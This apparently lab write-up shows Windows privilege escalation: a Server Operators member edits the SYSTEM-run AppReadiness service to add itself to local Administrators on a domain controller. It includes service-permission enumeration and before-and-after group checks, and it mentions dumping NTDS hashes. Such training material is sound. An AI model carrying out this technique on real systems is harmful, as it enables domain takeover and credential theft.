Server Operators is a group which allow all members to manage windows servers without needing assignment of Domain Admin privileges
Membership of this group confers the powerful SeBackupPrivilege and SeRestorePrivilege privileges and the ability to control local services.
We will exploit the ability of control local services
which we will edit service running with system privilege and we will user our privilege in server operators to control this serves to make us Local Administrator
Scanning the AppReadiness Service
AppReadiness is a service found in windows
we found this service running with system privilege
C:\htb> sc qc AppReadiness[SC] QueryServiceConfig SUCCESSSERVICE_NAME: AppReadiness TYPE : 20 WIN32_SHARE_PROCESS START_TYPE : 3 DEMAND_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Windows\System32\svchost.exe-k AppReadiness -p LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : App Readiness DEPENDENCIES :**SERVICE_START_NAME : LocalSystem# LocalSystem is NT AUTHORITY\SYSTEM**
Checking Service Permissions with PsService
we use it to check server operators permissions on the service.
PsService works much like the sc utility and can display service status and configurations and also allow you to start, stop, pause, resume, and restart services both locally and on remote hosts.
We found our group has a full access
Checking Local Admin Group Membership
to check our account is not present in this group
Modifying the Service Binary Path
we will change binary path to execute command to add our current user to the administrators group
Starting the Service
Starting the service fails, which is expected.
Confirming Local Admin Group Membership
If we check the membership of the administrators group, we see that the command was executed successfully.
Confirming Local Admin Access on Domain Controller
From here, we have full control over the Domain Controller and could retrieve all credentials from the NTDS database and access other systems, and perform post-exploitation tasks.
Retrieving NTLM Password Hashes from the Domain Controller
C:\htb> c:\Tools\PsService.exe security AppReadiness
PsService v2.25 - Service information and configuration utility
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com
SERVICE_NAME: AppReadiness
DISPLAY_NAME: App Readiness
ACCOUNT: LocalSystem
SECURITY:
[ALLOW] NT AUTHORITY\SYSTEM
Query status
Query Config
Interrogate
Enumerate Dependents
Pause/Resume
Start
Stop
User-Defined Control
Read Permissions
[ALLOW] BUILTIN\Administrators
All
[ALLOW] NT AUTHORITY\INTERACTIVE
Query status
Query Config
Interrogate
Enumerate Dependents
User-Defined Control
Read Permissions
[ALLOW] NT AUTHORITY\SERVICE
Query status
Query Config
Interrogate
Enumerate Dependents
User-Defined Control
Read Permissions
**[ALLOW] BUILTIN\Server Operators
All**
C:\htb> net localgroup Administrators
Alias name Administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
Domain Admins
Enterprise Admins
The command completed successfully.
C:\htb> sc start AppReadiness
[SC] StartService FAILED 1053:
The service did not respond to the start or control request in a timely fashion.
C:\htb> net localgroup Administrators
Alias name Administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
Domain Admins
Enterprise Admins
server_adm
The command completed successfully.
